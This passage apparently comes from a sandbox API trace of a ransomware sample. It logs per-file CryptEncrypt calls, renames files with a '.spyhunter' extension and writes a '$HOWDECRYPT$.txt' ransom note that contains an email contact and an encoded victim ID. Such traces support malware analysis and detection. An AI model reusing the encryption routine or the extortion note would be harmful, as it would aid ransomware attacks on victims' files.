lpNumberOfBytesWritten=0x25cfc7c*=0x30, lpOverlapped=0x0) returned 1 [0092.862] CloseHandle (hObject=0x16c) returned 1 [0092.872] GetProcessHeap () returned 0x2c0000 [0092.872] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x3867e8 [0092.873] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\CHINESET.SHX.spyhunter") returned 92 [0092.873] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\CHINESET.SHX" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\chineset.shx"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\CHINESET.SHX.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\chineset.shx.spyhunter")) returned 1 [0092.874] GetProcessHeap () returned 0x2c0000 [0092.874] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3867e8 | out: hHeap=0x2c0000) returned 1 [0092.874] GetProcessHeap () returned 0x2c0000 [0092.874] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0092.874] GetProcessHeap () returned 0x2c0000 [0092.874] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34eba8 | out: hHeap=0x2c0000) returned 1 [0092.874] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfcb8 | out: pbBuffer=0x25cfcb8) returned 1 [0092.874] GetProcessHeap () returned 0x2c0000 [0092.874] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0092.875] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfcb0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfcb0*=0x30) returned 1 [0092.875] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-highlight.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_frame-highlight.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.875] GetProcessHeap () returned 0x2c0000 [0092.875] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0092.875] GetProcessHeap () returned 0x2c0000 [0092.876] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x378390 | out: hHeap=0x2c0000) returned 1 [0092.876] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfcb8 | out: pbBuffer=0x25cfcb8) returned 1 [0092.876] GetProcessHeap () returned 0x2c0000 [0092.876] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0092.876] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfcb0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfcb0*=0x30) returned 1 [0092.876] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-border.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_frame-border.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.876] GetProcessHeap () returned 0x2c0000 [0092.876] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0092.876] GetProcessHeap () returned 0x2c0000 [0092.876] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x346c68 | out: hHeap=0x2c0000) returned 1 [0092.876] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfcb0 | out: pbBuffer=0x25cfcb0) returned 1 [0092.876] GetProcessHeap () returned 0x2c0000 [0092.876] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0092.876] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfca8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfca8*=0x30) returned 1 [0092.876] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-previous-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_btn-previous-static.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.877] GetProcessHeap () returned 0x2c0000 [0092.877] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0092.877] GetProcessHeap () returned 0x2c0000 [0092.877] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34f508 | out: hHeap=0x2c0000) returned 1 [0092.877] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfcb0 | out: pbBuffer=0x25cfcb0) returned 1 [0092.877] GetProcessHeap () returned 0x2c0000 [0092.877] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0092.877] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfca8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfca8*=0x30) returned 1 [0092.877] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-previous-over-select.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_btn-previous-over-select.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.880] GetProcessHeap () returned 0x2c0000 [0092.880] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0092.880] GetProcessHeap () returned 0x2c0000 [0092.880] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3554a8 | out: hHeap=0x2c0000) returned 1 [0092.880] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfca8 | out: pbBuffer=0x25cfca8) returned 1 [0092.880] GetProcessHeap () returned 0x2c0000 [0092.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0092.880] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfca0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfca0*=0x30) returned 1 [0092.880] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-over-DOT.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_btn-over-dot.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.881] GetProcessHeap () returned 0x2c0000 [0092.881] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0092.881] GetProcessHeap () returned 0x2c0000 [0092.881] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x346808 | out: hHeap=0x2c0000) returned 1 [0092.881] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfca8 | out: pbBuffer=0x25cfca8) returned 1 [0092.881] GetProcessHeap () returned 0x2c0000 [0092.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0092.881] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfca0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfca0*=0x30) returned 1 [0092.881] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-next-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_btn-next-static.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.882] GetProcessHeap () returned 0x2c0000 [0092.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0092.882] GetProcessHeap () returned 0x2c0000 [0092.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x377f08 | out: hHeap=0x2c0000) returned 1 [0092.882] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfca0 | out: pbBuffer=0x25cfca0) returned 1 [0092.882] GetProcessHeap () returned 0x2c0000 [0092.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0092.882] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfc98*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfc98*=0x30) returned 1 [0092.882] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-next-over-select.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_btn-next-over-select.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.882] GetProcessHeap () returned 0x2c0000 [0092.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0092.882] GetProcessHeap () returned 0x2c0000 [0092.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34f058 | out: hHeap=0x2c0000) returned 1 [0092.882] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfca0 | out: pbBuffer=0x25cfca0) returned 1 [0092.882] GetProcessHeap () returned 0x2c0000 [0092.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0092.882] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfc98*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfc98*=0x30) returned 1 [0092.883] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-back-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_btn-back-static.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.883] GetProcessHeap () returned 0x2c0000 [0092.883] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0092.883] GetProcessHeap () returned 0x2c0000 [0092.883] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3782a8 | out: hHeap=0x2c0000) returned 1 [0092.883] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfc98 | out: pbBuffer=0x25cfc98) returned 1 [0092.883] GetProcessHeap () returned 0x2c0000 [0092.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0092.883] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfc90*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfc90*=0x30) returned 1 [0092.883] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-back-over-select.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_btn-back-over-select.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.883] GetProcessHeap () returned 0x2c0000 [0092.883] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0092.883] GetProcessHeap () returned 0x2c0000 [0092.883] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34f148 | out: hHeap=0x2c0000) returned 1 [0092.883] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfc98 | out: pbBuffer=0x25cfc98) returned 1 [0092.883] GetProcessHeap () returned 0x2c0000 [0092.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0092.883] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfc90*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfc90*=0x30) returned 1 [0092.884] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_LOOP_BG_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\notes_loop_bg_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.884] GetProcessHeap () returned 0x2c0000 [0092.884] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0092.884] GetProcessHeap () returned 0x2c0000 [0092.884] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x346648 | out: hHeap=0x2c0000) returned 1 [0092.884] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfc90 | out: pbBuffer=0x25cfc90) returned 1 [0092.884] GetProcessHeap () returned 0x2c0000 [0092.884] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0092.884] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfc88*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfc88*=0x30) returned 1 [0092.884] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_LOOP_BG.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\notes_loop_bg.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.884] GetProcessHeap () returned 0x2c0000 [0092.884] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0092.884] GetProcessHeap () returned 0x2c0000 [0092.884] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37e200 | out: hHeap=0x2c0000) returned 1 [0092.884] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfc90 | out: pbBuffer=0x25cfc90) returned 1 [0092.884] GetProcessHeap () returned 0x2c0000 [0092.884] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0092.884] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfc88*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfc88*=0x30) returned 1 [0092.885] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_INTRO_BG_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\notes_intro_bg_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.885] GetProcessHeap () returned 0x2c0000 [0092.885] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0092.885] GetProcessHeap () returned 0x2c0000 [0092.885] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x346d48 | out: hHeap=0x2c0000) returned 1 [0092.885] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfc88 | out: pbBuffer=0x25cfc88) returned 1 [0092.885] GetProcessHeap () returned 0x2c0000 [0092.885] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0092.885] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfc80*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfc80*=0x30) returned 1 [0092.885] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_INTRO_BG.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\notes_intro_bg.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.885] GetProcessHeap () returned 0x2c0000 [0092.885] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0092.885] GetProcessHeap () returned 0x2c0000 [0092.885] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37e560 | out: hHeap=0x2c0000) returned 1 [0092.885] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0092.887] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0092.887] WriteFile (in: hFile=0x16c, lpBuffer=0x25cfbbb*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cfce4, lpOverlapped=0x0 | out: lpBuffer=0x25cfbbb*, lpNumberOfBytesWritten=0x25cfce4*=0x127, lpOverlapped=0x0) returned 1 [0092.888] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0092.888] WriteFile (in: hFile=0x16c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cfce4, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cfce4*=0x2ac, lpOverlapped=0x0) returned 1 [0092.888] CloseHandle (hObject=0x16c) returned 1 [0092.888] GetProcessHeap () returned 0x2c0000 [0092.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3781c0 | out: hHeap=0x2c0000) returned 1 [0092.888] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfc80 | out: pbBuffer=0x25cfc80) returned 1 [0092.888] GetProcessHeap () returned 0x2c0000 [0092.889] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0092.889] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfc78*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfc78*=0x30) returned 1 [0092.889] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\whitemenu.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\whitemenu.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.889] GetProcessHeap () returned 0x2c0000 [0092.889] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0092.889] GetProcessHeap () returned 0x2c0000 [0092.889] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x346728 | out: hHeap=0x2c0000) returned 1 [0092.889] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfc80 | out: pbBuffer=0x25cfc80) returned 1 [0092.889] GetProcessHeap () returned 0x2c0000 [0092.889] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0092.889] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfc78*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfc78*=0x30) returned 1 [0092.889] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\userContent_16x9_imagemask.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\usercontent_16x9_imagemask.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.889] GetProcessHeap () returned 0x2c0000 [0092.889] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0092.889] GetProcessHeap () returned 0x2c0000 [0092.889] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35a260 | out: hHeap=0x2c0000) returned 1 [0092.889] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfc78 | out: pbBuffer=0x25cfc78) returned 1 [0092.890] GetProcessHeap () returned 0x2c0000 [0092.890] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0092.890] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfc70*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfc70*=0x30) returned 1 [0092.890] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Trans_Scene_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_trans_scene_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.890] GetProcessHeap () returned 0x2c0000 [0092.890] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0092.890] GetProcessHeap () returned 0x2c0000 [0092.890] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x355698 | out: hHeap=0x2c0000) returned 1 [0092.891] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfc78 | out: pbBuffer=0x25cfc78) returned 1 [0092.891] GetProcessHeap () returned 0x2c0000 [0092.891] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0092.891] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfc70*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfc70*=0x30) returned 1 [0092.891] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\title_trans_scene.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_trans_scene.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.891] GetProcessHeap () returned 0x2c0000 [0092.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0092.891] GetProcessHeap () returned 0x2c0000 [0092.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34ee78 | out: hHeap=0x2c0000) returned 1 [0092.891] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfc70 | out: pbBuffer=0x25cfc70) returned 1 [0092.891] GetProcessHeap () returned 0x2c0000 [0092.891] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0092.891] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfc68*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfc68*=0x30) returned 1 [0092.891] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Trans_Notes_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_trans_notes_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.891] GetProcessHeap () returned 0x2c0000 [0092.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0092.891] GetProcessHeap () returned 0x2c0000 [0092.892] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x355790 | out: hHeap=0x2c0000) returned 1 [0092.892] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfc70 | out: pbBuffer=0x25cfc70) returned 1 [0092.892] GetProcessHeap () returned 0x2c0000 [0092.892] RtlAllocateHeap 